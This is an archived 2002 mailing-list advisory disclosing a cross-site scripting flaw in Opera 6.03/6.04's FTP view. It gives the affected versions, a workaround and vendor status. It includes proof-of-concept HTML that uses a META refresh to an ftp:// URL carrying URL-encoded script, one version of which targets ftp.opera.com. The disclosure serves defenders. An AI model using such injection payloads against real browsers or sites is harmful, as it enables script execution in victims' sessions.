Opera FTP View Cross-Site Scripting Vulnerability

From: Eiji James Yoshida (ptrs-ejyat_private)
Date: Mon Aug 05 2002 - 17:08:47 PDT

  • Next message: Eiji James Yoshida: "Mozilla FTP View Cross-Site Scripting Vulnerability"

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    
    Title:
    ~~~~~~~~~~~~~~~~~
    Opera FTP View Cross-Site Scripting Vulnerability
    
     
    Date:
    ~~~~~~~~~~~~~~~~~
    4 August 2002
    
     
    Author:
    ~~~~~~~~~~~~~~~~~
    Eiji James Yoshida [ptrs-ejyat_private]
    
     
    Risk:
    ~~~~~~~~~~~~~~~~~
    Medium
    
     
    Vulnerable:
    ~~~~~~~~~~~~~~~~~
    Windows2000 SP2 Opera 6.03
    Windows2000 SP2 Opera 6.04
    
     
    Overview:
    ~~~~~~~~~~~~~~~~~
    Opera allows running Malicious Scripts due to a bug in 'FTP view'.
    If you click on a malicious link, the script embedded in URL will run.
    
     
    Details:
    ~~~~~~~~~~~~~~~~~
    This problem is in 'FTP view'.
    The '<title>URL</title>' is not escaped.
    
     
    Exploit code:
    ~~~~~~~~~~~~~~~~~
    <html>
    <head>
    <META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
    </head>
    <body>
    <script>window.open("ftp://[FTPserver]/");</script>
    </body>
    </html>
    
    Example:
    <html>
    <head>
    <META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3eat_private/">
    </head>
    <body>
    <script>window.open("ftp://ftp.opera.com/");</script>
    </body>
    </html>
    
     
    Demonstration:
    ~~~~~~~~~~~~~~~~~
    http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html
    
     
    Workaround:
    ~~~~~~~~~~~~~~~~~
    Disable JavaScript.
    
     
    Vendor status:
    ~~~~~~~~~~~~~~~~~
    Opera Software ASA was notified on 30 June 2002.
     
    
    - -------------------------------------------------------------
    Eiji "James" Yoshida
    penetration technique research site
    E-mail: zaddikat_private
    URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
    - -------------------------------------------------------------
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 6.5.8ckt
    Comment: Eiji James Yoshida
    
    iQA/AwUBPU8TMjnqpMRtMot1EQJ1DwCgs1v96kQ5KN42NVjf3rjUQO6iWOMAoKEE
    e1I1peQyP4eIEgAEIhMv+x67
    =6Qcu
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Tue Aug 06 2002 - 07:52:50 PDT